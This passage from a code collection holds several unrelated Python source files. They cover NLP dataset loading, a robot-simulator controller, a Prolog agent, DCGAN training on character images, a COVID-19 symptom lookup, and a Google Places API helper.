filepathlow.endswith('.bin.gz') or filepathlow.endswith('.w2v.bin.gz'): try: return KeyedVectors.load_word2vec_format(filepath, binary=True, limit=nrows) except (TypeError, UnicodeError): pass if filepathlow.endswith('.gz'): try: filepath = ensure_open(filepath) except: # noqa pass if re.match(r'.json([.][a-z]{0,3}){0,2}', filepathlow): return read_json(filepath) if filepathlow.endswith('.tsv.gz') or filepathlow.endswith('.tsv'): try: return pd.read_table(filepath) except: # noqa pass if filepathlow.endswith('.csv.gz') or filepathlow.endswith('.csv'): try: return read_csv(filepath) except: # noqa pass if filepathlow.endswith('.txt'): try: return read_text(filepath) except (TypeError, UnicodeError): pass return filepaths[name] elif name in DATASET_NAME2FILENAME: return read_named_csv(name, nrows=nrows) elif name in DATA_NAMES: return read_named_csv(DATA_NAMES[name], nrows=nrows) elif os.path.isfile(name): return read_named_csv(name, nrows=nrows) elif os.path.isfile(os.path.join(DATA_PATH, name)): return read_named_csv(os.path.join(DATA_PATH, name), nrows=nrows) msg = 'Unable to find dataset "{}"" in {} or {} (*.csv.gz, *.csv, *.json, *.zip, or *.txt)\n'.format( name, DATA_PATH, BIGDATA_PATH) msg += 'Available dataset names include:\n{}'.format('\n'.join(DATASET_NAMES)) log.error(msg) raise IOError(msg) def multifile_dataframe(paths=['urbanslang{}of4.csv'.format(i) for i in range(1, 5)], header=0, index_col=None): """Like pandas.read_csv, but loads and concatenates (df.append(df)s) DataFrames together""" df = pd.DataFrame() for p in paths: df = df.append(read_csv(p, header=header, index_col=index_col), ignore_index=True if not index_col else False) if index_col and df.index.name == index_col: del df[index_col] return df def get_wikidata_qnum(wikiarticle, wikisite): """Retrieve the Query number for a wikidata database of metadata about a particular article >>> print(get_wikidata_qnum(wikiarticle="Andromeda Galaxy", wikisite="enwiki")) Q2469 """ resp = requests_get('https://www.wikidata.org/w/api.php', timeout=5, params={ 'action': 'wbgetentities', 'titles': wikiarticle, 'sites': wikisite, 'props': '', 'format': 'json' }).json() return list(resp['entities'])[0] DATASET_FILENAMES = [f['name'] for f in find_files(DATA_PATH, ext='.csv.gz', level=0)] DATASET_FILENAMES += [f['name'] for f in find_files(DATA_PATH, ext='.csv', level=0)] DATASET_FILENAMES += [f['name'] for f in find_files(DATA_PATH, ext='.json', level=0)] DATASET_FILENAMES += [f['name'] for f in find_files(DATA_PATH, ext='.txt', level=0)] DATASET_NAMES = [ f[:-4] if f.endswith('.csv') else f for f in [os.path.splitext(f)[0] for f in DATASET_FILENAMES]] DATASET_NAME2FILENAME = dict(sorted(zip(DATASET_NAMES, DATASET_FILENAMES))) def str2int(s): s = ''.join(c for c in s if c in '0123456789') return int(s or INT_MIN) def clean_toxoplasmosis(url='http://www.rightdiagnosis.com/t/toxoplasmosis/stats-country.htm'): dfs = pd.read_html('http://www.rightdiagnosis.com/t/toxoplasmosis/stats-country.htm', header=0) df = dfs[0].copy() df.columns = normalize_column_names(df.columns) df = df.dropna().copy() df['extrapolated_prevalence'] = df['extrapolated_prevalence'].apply(str2int) df['population_estimated_used'] = df['population_estimated_used'].apply(str2int) df['frequency'] = df.extrapolated_prevalence.astype(float) / df.population_estimated_used return df def normalize_column_names(df): r""" Clean up whitespace in column names. See better version at `pugnlp.clean_columns` >>> df = pd.DataFrame([[1, 2], [3, 4]], columns=['Hello World', 'not here']) >>> normalize_column_names(df) ['hello_world', 'not_here'] """ columns = df.columns if hasattr(df, 'columns') else df columns = [c.lower().replace(' ', '_') for c in columns] return columns def clean_column_values(df, inplace=True): r""" Convert dollar value strings, numbers with commas, and percents into floating point values >>> df = get_data('us_gov_deficits_raw') >>> df2 = clean_column_values(df, inplace=False) >>> df2.iloc[0] Fiscal year 10/2017-3/2018 President's party R Senate majority party R House majority party R Top-bracket marginal income tax rate 38.3 National debt millions 2.10896e+07 National debt millions of 1983 dollars 8.47004e+06 Deficit\n(millions of 1983 dollars) 431443 Surplus string in 1983 dollars NaN Deficit string in 1983 dollars ($ = $10B) $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Net surplus in 1983 dollars ($B) -430 Name: 0, dtype: object """ dollars_percents = re.compile(r'[%$,;\s]+') if not inplace: df = df.copy() for c in df.columns: values = None if df[c].dtype.char in '<U S O'.split(): try: values = df[c].copy() values = values.fillna('') values = values.astype(str).str.replace(dollars_percents, '') # values = values.str.strip().str.replace(dollars_percents, '').str.strip() if values.str.len().sum() > .2 * df[c].astype(str).str.len().sum(): values[values.isnull()] = np.nan values[values == ''] = np.nan values = values.astype(float) except ValueError: values = None except: # noqa log.error('Error on column {} with dtype {}'.format(c, df[c].dtype)) raise if values is not None: if values.isnull().sum() < .6 * len(values) and values.any(): df[c] = values return df def load_geonames(filepath='http://download.geonames.org/export/dump/cities1000.zip'): """Clean the table of city metadata from download.geoname.org/export/dump/{filename} Reference: http://download.geonames.org/export/dump/readme.txt 'cities1000.txt' and 'allCountries.txt' have the following tab-separated fields: 0 geonameid : integer id of record in geonames database 1 name : name of geographical point (utf8) varchar(200) 2 asciiname : name of geographical point in plain ascii characters, varchar(200) 3 alternatenames : alternatenames, comma separated, ascii names automatically transliterated, convenience attribute from alternatename table, varchar(10000) 4 latitude : latitude in decimal degrees (wgs84) 5 longitude : longitude in decimal degrees (wgs84) 6 feature class : see http://www.geonames.org/export/codes.html, char(1) 7 feature code : see http://www.geonames.org/export/codes.html, varchar(10) 8 country code : ISO-3166 2-letter country code, 2 characters 9 cc2 : alternate country codes, comma separated, ISO-3166 2-letter country code, 200 characters 10 admin1 code : fipscode (subject to change to iso code), see exceptions below, see file admin1Codes.txt for display names of this code; varchar(20) 11 admin2 code : code for the second administrative division, a county in the US, see file admin2Codes.txt; varchar(80) 12 admin3 code : code for third level administrative division, varchar(20) 13 admin4 code : code for fourth level administrative division, varchar(20) 14 population : bigint (8 byte int) 15 elevation : in meters, integer 16 dem : digital elevation model, srtm3 or gtopo30, average elevation of (3''x3''ca 90mx90m) or 30''x30''(ca 900mx900m) area in meters, integer. srtm processed by cgiar/ciat. 17 timezone : the iana timezone id (see file timeZone.txt) varchar(40) 18 modification date : date of last modification in yyyy-MM-dd format """ columns = ['geonameid', 'name', 'asciiname', 'alternatenames', 'latitude', 'longitude', 'feature class', 'feature code', 'country code'] columns += ['cc2', 'admin1_code', 'admin2_code', 'admin3_code', 'admin4_code', 'population', 'elevation', 'dem', 'timezone', 'modification date'] columns = normalize_column_names(columns) df = pd.read_csv(filepath, sep='\t', index_col=None, low_memory=False, header=None) df.columns = columns return df def load_geo_adwords(filename='AdWords API Location Criteria 2017-06-26.csv.gz'): """ WARN: Not a good source of city names. This table has many errors, even after cleaning""" df = pd.read_csv(filename, header=0, index_col=0, low_memory=False) df.columns = [c.replace(' ', '_').lower() for c in df.columns] canonical = pd.DataFrame([list(row) for row in df.canonical_name.str.split(',').values]) def cleaner(row): cleaned = np.array( [s for i, s in enumerate(row.values) if s not in ('Downtown', None) and (i > 3 or row[i + 1] != s)]) if len(cleaned) == 2: cleaned = [cleaned[0], None, cleaned[1], None, None] else: cleaned = list(cleaned) + [None] * (5 - len(cleaned)) if not np.all(np.array(row.values)[:3] == np.array(cleaned)[:3]): log.info('{} => {}'.format(row.values, cleaned)) return list(cleaned) cleancanon = canonical.apply(cleaner, axis=1) cleancanon.columns = 'city region country extra extra2'.split() df['region'] = cleancanon.region df['country'] = cleancanon.country return df def clean_cornell_movies(filename='cornell_movie_dialogs_corpus.zip', subdir='cornell movie-dialogs corpus'): """ Load a dataframe of ~100k raw (uncollated) movie lines from the cornell movies dialog corpus >>> local_filepath = download_file(BIG_URLS['cornell_movie_dialogs_corpus'][0]) >>> df = clean_cornell_movies(filename='cornell_movie_dialogs_corpus.zip') >>> df.describe(include='all') user movie person utterance count 304713 304713 304713 304446 unique 9035 617 5356 265783 top u4525 m289 JACK What? freq 537 1530 3032 1684 """ fullpath_zipfile = find_filepath(filename) dirname = os.path.basename(filename) subdir = 'cornell movie-dialogs corpus' if fullpath_zipfile.lower().endswith('.zip'): retval = unzip(fullpath_zipfile) log.debug(f'unzip({fullpath_zipfile}) return value: {retval}') dirname = dirname[:-4] fullpath_movie_lines = os.path.join(BIGDATA_PATH, dirname, subdir, 'movie_lines.txt') dialog = pd.read_csv( fullpath_movie_lines, sep=r'\+\+\+\$\+\+\+', engine='python', header=None, index_col=0) dialog.columns = 'user movie person utterance'.split() dialog.index.name = 'line' dialog.index = [int(s.strip()[1:]) for s in dialog.index.values] dialog.sort_index(inplace=True) for col in dialog.columns: dialog[col] = dialog[col].str.strip() return dialog def isglove(filepath): """ Get the first word vector in a GloVE file and return its dimensionality or False if not a vector >>> isglove(os.path.join(DATA_PATH, 'cats_and_dogs.txt')) False """ with ensure_open(filepath, 'r') as f: header_line = f.readline() vector_line = f.readline() try: num_vectors, num_dim = header_line.split() return int(num_dim) except (ValueError, TypeError): pass vector = vector_line.split()[1:] if len(vector) % 10: print(vector) print(len(vector) % 10) return False try: vector = np.array([float(x) for x in vector]) except (ValueError, TypeError): return False if np.all(np.abs(vector) < 12.): return len(vector) return False def nlp(texts, lang='en', linesep=None, verbose=True): r""" Use the SpaCy parser to parse and tag natural language strings. Load the SpaCy parser language model lazily and share it among all nlpia modules. Probably unnecessary, since SpaCy probably takes care of this with `spacy.load()` >>> doc = nlp("Domo arigatto Mr. Roboto.") >>> doc.text 'Domo arigatto Mr. Roboto.' >>> doc.ents (Roboto,) >>> docs = nlp("Hey Mr. Tangerine Man!\nPlay a song for me.\n", linesep='\n') >>> doc = docs[0] >>> [t for t in doc] [Hey, Mr., Tangerine, Man, !] >>> [tok.text for tok in doc] ['Hey', 'Mr.', 'Tangerine', 'Man', '!'] >>> [(tok.text, tok.tag_) for tok in doc] [('Hey', 'UH'), ('Mr.', 'NNP'), ('Tangerine', 'NNP'), ('Man', 'NNP'), ('!', '.')] >>> [(ent.text, ent.ent_id, ent.has_vector, ent.vector[:3].round(3)) for ent in doc.ents] [('Tangerine', 0, True, array([0.678, 0.134, 2.162], dtype=float32))] """ # doesn't let you load a different model anywhere else in the module linesep = os.linesep if linesep in ('default', True, 1, 'os') else linesep tqdm_prog = no_tqdm if (not verbose or (hasattr(texts, '__len__') and len(texts) < 3)) else tqdm global _parse if not _parse: try: _parse = spacy.load(lang) except (OSError, IOError): try: spacy.cli.download(lang) except URLError: log.warning("Unable to download Spacy language model '{}' so nlp(text) just returns text.split()".format(lang)) parse = _parse or str.split # TODO: reverse this recursion (str first then sequence) to allow for sequences of sequences of texts if isinstance(texts, str): if linesep: return nlp(texts.split(linesep)) else: return nlp([texts]) if hasattr(texts, '__len__'): if len(texts) == 1: return parse(texts[0]) elif len(texts) > 1: return [(parse or str.split)(text) for text in tqdm_prog(texts)] else: return None else: # return generator if sequence of strings doesn't have __len__ which means its an iterable or generator itself return (parse(text) for text in tqdm_prog(texts)) # TODO: return the same type as the input, e.g. `type(texts)(texts)` def clean_win_tsv(filepath=os.path.join(DATA_PATH, 'Products.txt'), index_col=False, sep='\t', lineterminator='\r', error_bad_lines=False, **kwargs): """ Load and clean tab-separated files saved on Windows OS ('\r\n') """ df = pd.read_csv(filepath, index_col=index_col, sep=sep, lineterminator=lineterminator, error_bad_lines=error_bad_lines, **kwargs) index_col = df.columns[0] original_len = len(df) if df[index_col].values[-1] == '\n': df.iloc[-1, 0] = np.nan original_len = len(df) - 1 df.dropna(how='all', inplace=True) df[index_col] = df[index_col].str.strip().apply(lambda x: x if x else str(INT_MIN)).astype(int) df = df[~(df[index_col] == INT_NAN)] df.set_index(index_col, inplace=True) if len(df) != original_len: log.warning(('Loaded {} rows from tsv. Original file, "{}", contained {} seemingly valid lines.' + 'Index column: {}').format(len(df), original_len, filepath, index_col)) return df ```
{ "source": "AAAI-DISIM-UnivAQ/pedro_c-sim_bridge", "score": 3 }
#### File: pedro_c-sim_bridge/RobotControl/pedro_controller.py ```python from pedroclient import * import time # Handling messages from the TR program class MessageThread(threading.Thread): def __init__(self, client, q): self.running = True self.client = client self.queue = q threading.Thread.__init__(self) self.daemon = True def run(self): while self.running: p2pmsg = self.client.get_term()[0] self.queue.put(p2pmsg) def stop(self): self.running = False class Vrep_Pedro(object): # sensors: # sonar( Ld, Rd) # # motion: # move_forward(speed) # stop() # turnLeft(angleSpeed) # turnRight(angleSpeed) def __init__(self, vrep_client_id): self.vrep_client_id = vrep_client_id self.tr_client_addr = None self.client = PedroClient() # register vrep_pedro as the name of this process with Pedro self.client.register("robot_sim") self.queue = queue.Queue(0) self.message_thread = MessageThread(self.client, self.queue) self.message_thread.start() self.set_client("['127.0.0.1']") # def methods for sensing and acting to the robot in the simulator def move_forward(self, speed): print("move_forward", speed) self.vrep_client_id.move_forward(speed) def stop_move(self): print("stop") self.vrep_client_id.move_forward(0.0) def turn_left(self, angleSpeed): self.vrep_client_id.rotate_left(angleSpeed) def turn_right(self, angleSpeed): self.vrep_client_id.rotate_right(angleSpeed) def set_client(self, addr): self.tr_client_addr = addr def send_percept(self, percepts_string): print("send_percept", str(self.tr_client_addr), percepts_string) if self.client.p2p(self.tr_client_addr, percepts_string) == 0: print("Error", percepts_string) def exit(self): self.message_thread.stop() self.client.p2p("messages:" + self.tr_client_addr, "quiting") def process_initialize(self): # Block unitil message arrives print('listening start signal..') p2pmsg = self.queue.get() print(p2pmsg) message = p2pmsg.args[2] if str(message) == 'initialise_': # get the sender address percepts_addr = p2pmsg.args[1] print("percepts_addr", str(percepts_addr)) self.set_client(percepts_addr) # VREP code goes here so the visualization can # send back any initial percepts (iniital state) # create a string representing a list of initial percepts # say init_percepts and call # self.parent.send_percept(init_percepts) init_percepts = '[]' self.send_percept(init_percepts) else: print("Didn't get initialise_ message") def process_controls(self): while not self.queue.empty(): p2pmsg = self.queue.get() msg = p2pmsg.args[2] print("process_controls message: ", str(msg)) if not msg.is_pstruct() or msg.functor.val != 'controls': print("CONTROLS: ", str(msg)) assert False actions = msg.args[0] if not actions.is_plist(): print("CONTROLS: ", str(actions)) assert False for a in actions.toList(): self.process_action(a) def process_action(self, message): if not message.is_pstruct(): return functor = message.functor if not functor.is_patom(): return cmd_type = functor.val cmd = message.args[0] if not cmd.is_pstruct(): return if cmd_type == 'stop_': if cmd.functor.val == 'move' and cmd.arity() == 2: self.stop_move() elif cmd_type in ['start_', 'mod_']: if cmd.functor.val == 'move' and cmd.arity() == 1: speed = cmd.args[0].val self.move_forward(speed) if cmd.functor.val == 'turn_left' and cmd.arity() == 1: speed = cmd.args[0].val self.turn_left(speed) if cmd.functor.val == 'turn_right' and cmd.arity() == 1: speed = cmd.args[0].val self.turn_right(speed) ```
{ "source": "AAAI-DISIM-UnivAQ/prothonics", "score": 2 }
#### File: prothonics/brain/__init__.py ```python from pyswip import Prolog import prothonics.brain.learning import prothonics.brain.memory import prothonics.brain.behaviour class Brain: ''' The main intelligent controller of the Prothonics Agent. ''' __learning = None __memory = None __behaviour = None __prologEngine = None # Prolog engine, reasoning and learning core def __init__(self, decisionsLen, factsLen): self.__prologEngine = Prolog() # The engine given by Pyswip SWI Prolog library self.__learning = learning.Learning(self.__prologEngine) self.__memory = memory.Memory(decisionsLen, factsLen) self.__behaviour = behaviour.Behaviour(self.__prologEngine) def useLearning(self): return self.__learning def useMemory(self): return self.__memory def useBehaviour(self): return self.__behaviour def reactTo(self, fact, decisionFactClass): ''' Learns a new fact and take a decision about it. It stores in memory the new fact and the new decision. :param fact: the new fact to learn, it's a string. :param decisionFactClass: the class of the fact that describes the solution. :return: ''' fact = str(fact) decisionFactClass = str(decisionFactClass) self.__learning.learnNewFact(fact) self.__memory.putNewFact(fact) newDecision = self.__behaviour.takeDecision(decisionFactClass=decisionFactClass, singleOut=True) if newDecision: self.__memory.putNewDecision(newDecision) return ``` #### File: brain/learning/__init__.py ```python class Learning: ''' The learning module of a Prothinics Agent Brain. ''' __prologEngine = None # Prolog Engine, reasoning and learning core def __init__(self, prologEngine): self.__prologEngine = prologEngine def cleanIdeas(self, aboutFact): ''' Deletes old facts from Prolog Engine. :param aboutFact: fact class that has to be cleaned. :return: ''' aboutFact = str(aboutFact) factClass = aboutFact.split('(')[0] + '(_)' self.__prologEngine.retractall(factClass) return def learnKnoledgeBaseFromFile(self, prologFilePath): ''' Learns from a SWI Prolog file. :param prologFilePath: The path of the Prolog (.pl or .txt) file we need to use. :return: ''' assert isinstance(prologFilePath, str) self.__prologEngine.consult(prologFilePath) return def learnNewFact(self, fact): ''' Asserts a new fact. :param fact: a string containing a Prolog fact. :return: ''' fact = str(fact).replace('"', "'") self.cleanIdeas(fact) self.__prologEngine.assertz(fact) return ```
{ "source": "aaaimx/covid19-assistant-api", "score": 3 }
#### File: covid19-assistant-api/main/diagnosis.py ```python import numpy as np import os from django.conf import settings diseases = ['', 'ALERGIA', 'COVID-19', 'INFECCIÓN RESPIRATORIA', 'RESFRIADO'] # Vector que se obtiene del frontend values = [4, 1, 1, 1, 1, 1, 1, 1, 4, 4, 1] def get_diagnosis(values): """ Get Diagnosis of diseases given a array of values :args: values: list() An array of 11 integers :retuns: hiper[pos]: an integer as diagnostic """ # Procesamiento para calcular el elemento a leer a partir del vector values = np.array(values) t = np.linspace(36,40,4) q = np.linspace(0,10,4) cuatros = np.zeros((11)) for i in range(11): cuatros[i] = 4 ** (10 - i) # Cálculo del elemento por leer en el archivo pos = int(sum((values - 1) * cuatros) + 1) - 1 # Lectura del archivo with open(os.path.join(settings.BASE_DIR, 'main/hiper.txt'), 'r') as fid: hiper = fid.read() fid.close() # Diagnóstico d = int(hiper[pos]) return d, diseases[d] ``` #### File: covid19-assistant-api/main/tasks.py ```python from random import random # project imports from .models import * # celery imports from celery.decorators import task from celery.task.schedules import crontab from celery.decorators import periodic_task import socketio def send_message(event, data): """ Conección al socket y envio de mensajes """ sio = socketio.Client() try: sio.connect('http://0.0.0.0:8000', namespaces=['/tasks']) except: sio.disconnect() finally: sio.emit(event, data, namespace="/tasks") # =================================================== # Tasks # =================================================== ``` #### File: covid19-assistant-api/project/socket_app.py ```python from django.conf import settings from random import random import socketio import os sio = socketio.Server(async_mode='eventlet', cors_allowed_origins="*") if not settings.ENV == 'development': # en desarrollo es necesario correr socket.io server # aqui debido a cambio en los archivos from project.wsgi import sio # =================================================== # Clients # =================================================== # Namespace for Celery tasks @sio.on('connect', namespace='/tasks') def connect(sid, environ): """ Escucha conecciones en un canal """ print("connect for tasks: ", sid) #Listining on namespace @sio.on('book',namespace='/tasks') def metrics(sid, book): """ Envia alerta de nuevos libros """ # emiitir mensajes sio.emit('chat message', book, namespace='/client') print("message ", book) # =================================================== # Disconnections # =================================================== @sio.on('disconnect') def disconnect(sid): """ Escucha desconecciones en todos los canales """ print('disconnect ', sid) ```
{ "source": "aaajiao/typeface", "score": 2 }
#### File: dcgan_code_mod/HITOR3C/train.py ```python import sys sys.path.append('..') import os import json from time import time import numpy as np from tqdm import tqdm #from matplotlib import pyplot as plt from sklearn.externals import joblib from itertools import izip import theano import theano.tensor as T from theano.sandbox.cuda.dnn import dnn_conv from lib import activations from lib import updates from lib import inits from lib.vis import grayscale_grid_vis from lib.rng import py_rng, np_rng from lib.ops import batchnorm, conv_cond_concat, deconv, dropout from lib.theano_utils import floatX, sharedX from lib.data_utils import OneHot, shuffle, iter_data from lib.metrics import nnc_score, nnd_score from load import get_hitor3c # parameters npx = 112 # pixels width/height of images npy = 112 ny = 10 # num classes force_include_classes = [] ### learning parameters k = 1 # num of discrim updates for each gen update l2 = 2.5e-5 # l2 weight decay b1 = 0.5 # momentum term of adam nc = 1 # num of channels in image nbatch = 128 # num of examples in batch nz = 100 # num of dim for Z ngfc = 1024 # num of gen units for fully connected layers ndfc = 1024 # num of discrim units for fully connected layers ngf = 64 # num of gen filters in first conv layer ndf = 64 # num of discrim filters in first conv layer nx = npx*npy*nc # num of dimensions in X niter = 100 # num of iter at starting learning rate niter_decay = 401 # num of iter to linearly decay learning rate to zero lr = 0.00022 # initial learning rate for adam # load data trX, vaX, teX, trY, vaY, teY, ny = get_hitor3c(ny, npx, npy, force_include_classes) vaX = floatX(vaX)/255. ntrain, nval, ntest = len(trX), len(vaX), len(teX) print "size of training set: %d" % len(trX) def transform(X): return (floatX(X)/255.).reshape(-1, nc, npx, npy) def inverse_transform(X): X = X.reshape(-1, npx, npy) return X model_dir = 'models/' samples_dir = 'samples/' if not os.path.exists('logs/'): os.makedirs('logs/') if not os.path.exists(model_dir): os.makedirs(model_dir) if not os.path.exists(samples_dir): os.makedirs(samples_dir) relu = activations.Rectify() sigmoid = activations.Sigmoid() lrelu = activations.LeakyRectify() bce = T.nnet.binary_crossentropy gifn = inits.Normal(scale=0.02) difn = inits.Normal(scale=0.02) npx_ = npx / 4 gw = gifn((nz+ny, ngfc), 'gw') gw2 = gifn((ngfc+ny, ngf*2*npx_*npx_), 'gw2') gw3 = gifn((ngf*2+ny, ngf, 5, 5), 'gw3') gwx = gifn((ngf+ny, nc, 5, 5), 'gwx') dw = difn((ndf, nc+ny, 5, 5), 'dw') dw2 = difn((ndf*2, ndf+ny, 5, 5), 'dw2') dw3 = difn((ndf*2*npx_*npx_+ny, ndfc), 'dw3') dwy = difn((ndfc+ny, 1), 'dwy') gen_params = [gw, gw2, gw3, gwx] discrim_params = [dw, dw2, dw3, dwy] def gen(Z, Y, w, w2, w3, wx): yb = Y.dimshuffle(0, 1, 'x', 'x') Z = T.concatenate([Z, Y], axis=1) h = relu(batchnorm(T.dot(Z, w))) h = T.concatenate([h, Y], axis=1) h2 = relu(batchnorm(T.dot(h, w2))) h2 = h2.reshape((h2.shape[0], ngf*2, npx_, npx_)) h2 = conv_cond_concat(h2, yb) h3 = relu(batchnorm(deconv(h2, w3, subsample=(2, 2), border_mode=(2, 2)))) h3 = conv_cond_concat(h3, yb) x = sigmoid(deconv(h3, wx, subsample=(2, 2), border_mode=(2, 2))) return x def discrim(X, Y, w, w2, w3, wy): yb = Y.dimshuffle(0, 1, 'x', 'x') X = conv_cond_concat(X, yb) h = lrelu(dnn_conv(X, w, subsample=(2, 2), border_mode=(2, 2))) h = conv_cond_concat(h, yb) h2 = lrelu(batchnorm(dnn_conv(h, w2, subsample=(2, 2), border_mode=(2, 2)))) h2 = T.flatten(h2, 2) h2 = T.concatenate([h2, Y], axis=1) h3 = lrelu(batchnorm(T.dot(h2, w3))) h3 = T.concatenate([h3, Y], axis=1) y = sigmoid(T.dot(h3, wy)) return y def load_model(model_path): gen_params_values = joblib.load(model_path + '_gen_params.jl') for p, v in izip(gen_params, gen_params_values): p.set_value(v) discrim_params_values = joblib.load(model_path + '_discrim_params.jl') for p, v in izip(discrim_params, discrim_params_values): p.set_value(v) X = T.tensor4() Z = T.matrix() Y = T.matrix() gX = gen(Z, Y, *gen_params) p_real = discrim(X, Y, *discrim_params) p_gen = discrim(gX, Y, *discrim_params) d_cost_real = bce(p_real, T.ones(p_real.shape)).mean() d_cost_gen = bce(p_gen, T.zeros(p_gen.shape)).mean() g_cost_d = bce(p_gen, T.ones(p_gen.shape)).mean() d_cost = d_cost_real + d_cost_gen g_cost = g_cost_d cost = [g_cost, d_cost, g_cost_d, d_cost_real, d_cost_gen] lrt = sharedX(lr) d_updater = updates.Adam(lr=lrt, b1=b1, regularizer=updates.Regularizer(l2=l2)) g_updater = updates.Adam(lr=lrt, b1=b1, regularizer=updates.Regularizer(l2=l2)) d_updates = d_updater(discrim_params, d_cost) g_updates = g_updater(gen_params, g_cost) updates = d_updates + g_updates print 'COMPILING' t = time() _train_g = theano.function([X, Z, Y], cost, updates=g_updates) _train_d = theano.function([X, Z, Y], cost, updates=d_updates) _gen = theano.function([Z, Y], gX) print '%.2f seconds to compile theano functions'%(time()-t) cols = 10 tr_idxs = np.arange(len(trX)) trX_vis = np.asarray([[trX[i] for i in py_rng.sample(tr_idxs[trY==y], cols)] for y in range(ny)]).reshape(ny * cols, -1) trX_vis = inverse_transform(transform(trX_vis)) grayscale_grid_vis(trX_vis, (ny, cols), 'samples/test.png') ############ # set up targets normally steps = 6 numtargets = 9 #This is how many letter you will count start = 1 targets = np.asarray([[i+start for _ in range(steps)] for i in range(numtargets)]) sample_ymb = floatX(OneHot(targets.flatten(), ny)) # set up random z sample_zmb = floatX(np_rng.uniform(-1., 1., size=(numtargets * steps, nz))) def gen_samples(n, nbatch=128): samples = [] labels = [] n_gen = 0 for i in range(n/nbatch): ymb = floatX(OneHot(np_rng.randint(0, ny, nbatch), ny)) zmb = floatX(np_rng.uniform(-1., 1., size=(nbatch, nz))) xmb = _gen(zmb, ymb) samples.append(xmb) labels.append(np.argmax(ymb, axis=1)) n_gen += len(xmb) n_left = n-n_gen ymb = floatX(OneHot(np_rng.randint(0, ny, n_left), ny)) zmb = floatX(np_rng.uniform(-1., 1., size=(n_left, nz))) xmb = _gen(zmb, ymb) samples.append(xmb) labels.append(np.argmax(ymb, axis=1)) return np.concatenate(samples, axis=0), np.concatenate(labels, axis=0) f_log = open('logs/log.ndjson', 'wb') log_fields = ['n_epochs', 'n_updates', 'n_examples', 'n_seconds','1k_va_nnc_acc', '10k_va_nnc_acc', '100k_va_nnc_acc','1k_va_nnd','10k_va_nnd','100k_va_nnd','g_cost','d_cost'] n_updates = 0 n_check = 0 n_epochs = 0 n_updates = 0 n_examples = 0 t = time() for epoch in range(1, niter+niter_decay+1): trX, trY = shuffle(trX, trY) for imb, ymb in tqdm(iter_data(trX, trY, size=nbatch), total=ntrain/nbatch): imb = transform(imb) ymb = floatX(OneHot(ymb, ny)) zmb = floatX(np_rng.uniform(-1., 1., size=(len(imb), nz))) if n_updates % (k+1) == 0: cost = _train_g(imb, zmb, ymb) else: cost = _train_d(imb, zmb, ymb) n_updates += 1 n_examples += len(imb) if (epoch-1) % 5 == 0 & False: g_cost = float(cost[0]) d_cost = float(cost[1]) gX, gY = gen_samples(100000) gX = gX.reshape(len(gX), -1) va_nnc_acc_1k = nnc_score(gX[:1000], gY[:1000], vaX, vaY, metric='euclidean') va_nnc_acc_10k = nnc_score(gX[:10000], gY[:10000], vaX, vaY, metric='euclidean') va_nnc_acc_100k = nnc_score(gX[:100000], gY[:100000], vaX, vaY, metric='euclidean') va_nnd_1k = nnd_score(gX[:1000], vaX, metric='euclidean') va_nnd_10k = nnd_score(gX[:10000], vaX, metric='euclidean') va_nnd_100k = nnd_score(gX[:100000], vaX, metric='euclidean') log = [n_epochs, n_updates, n_examples, time()-t, va_nnc_acc_1k, va_nnc_acc_10k, va_nnc_acc_100k, va_nnd_1k, va_nnd_10k, va_nnd_100k, g_cost, d_cost] print '%.0f %.2f %.2f %.2f %.4f %.4f %.4f %.4f %.4f'%(epoch, va_nnc_acc_1k, va_nnc_acc_10k, va_nnc_acc_100k, va_nnd_1k, va_nnd_10k, va_nnd_100k, g_cost, d_cost) f_log.write(json.dumps(dict(zip(log_fields, log)))+'\n') f_log.flush() n_epochs += 1 print "done epoch "+str(n_epochs); if (-1+n_epochs) % 10 == 0: samples = np.asarray(_gen(sample_zmb, sample_ymb)) grayscale_grid_vis(inverse_transform(samples), (samples.shape[0] / steps, steps), 'samples/%d.png'%(n_epochs)) if n_epochs > niter: lrt.set_value(floatX(lrt.get_value() - lr/niter_decay)) if n_epochs in [50, 100, 150, 200, 250, 300, 350, 400, 450, 500]: joblib.dump([p.get_value() for p in gen_params], 'models/%d_gen_params.jl'%(n_epochs)) joblib.dump([p.get_value() for p in discrim_params], 'models/%d_discrim_params.jl'%(n_epochs)) #load_model('/root/dcgan_code/mnist/models/cond_dcgan/242_lr2') #samples = np.asarray(_gen(sample_zmb, sample_ymb)) #grayscale_grid_vis(inverse_transform(samples), (samples.shape[0]/steps, steps), 'samples/%s/hi2%d.png'%(n_epochs)) ```
{ "source": "aaalana/SENG2021-Geographically", "score": 3 }
#### File: code/resources/parse.py ```python import requests from flask_restful import Resource, Api from flask import Flask, request, render_template #have to do error handing class Summary(Resource): def getPlaceSummary(place): S = requests.Session() URL = "https://en.wikipedia.org/api/rest_v1/page/summary/"+ place.replace(" ", "_") print(URL) TITLE = place PARAMS = { 'action': "parse", 'page': TITLE, 'format': "json" } R = S.get(url=URL) DATA = R.json() if (DATA["title"] == 'Not found.'): print ("No information found") return "No information found" return(DATA["extract"]) ``` #### File: code/resources/Places.py ```python from flask_restful import Resource, Api from flask import Flask, request, render_template import requests, json, geocoder APIKEY = '<KEY>' class Places(Resource): def get(self): data = findRestaurant(getCurrentLocation()) return data #find restaurants within 1000 of a location #ideally this would show restaurants within 5 minute drive of a route def findRestaurant (loc): radius = 1000 lat, lng = loc type = "restaurant" url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location={lat},{lng}&radius={radius}&type={type}&key={APIKEY}".format(lat = lat, lng = lng, radius = radius, type = type,APIKEY = APIKEY) print(url) response = requests.get(url) res = json.loads(response.text) #prints out info in a simplified format for result in res["results"]: info = ";".join(map(str,[result["name"],result["geometry"]["location"]["lat"],result["geometry"]["location"]["lng"],result.get("rating",0),result["place_id"]])) print(info) return res #returns locations of the first page of google for sydney tourist attractions def findPointsOfInterest(): location = "sydney" url = "https://maps.googleapis.com/maps/api/place/textsearch/json?query={location}+points+of+interest&language=en&key={APIKEY}".format(location=location, APIKEY=APIKEY) response = requests.get(url) res = json.loads(response.text) for result in res["results"]: print(result["name"]) print(res["results"]) return res["results"] #get current location def getCurrentLocation(): g = geocoder.ip('me') print("location is") print(g) lat = str(g.latlng[0]) lng = str(g.latlng[1]) return lat, lng def getPhoto(location): refID = location[0]["photos"][0]["photo_reference"] width = 400 url = "https://maps.googleapis.com/maps/api/place/photo?maxwidth={width}&photoreference={refID}&key={APIKEY}".format(width = width, refID = refID, APIKEY = APIKEY) print(url) return url def getPlacesInfo(locationstr): locationstr = locationstr.replace(' ','%20' ) url = 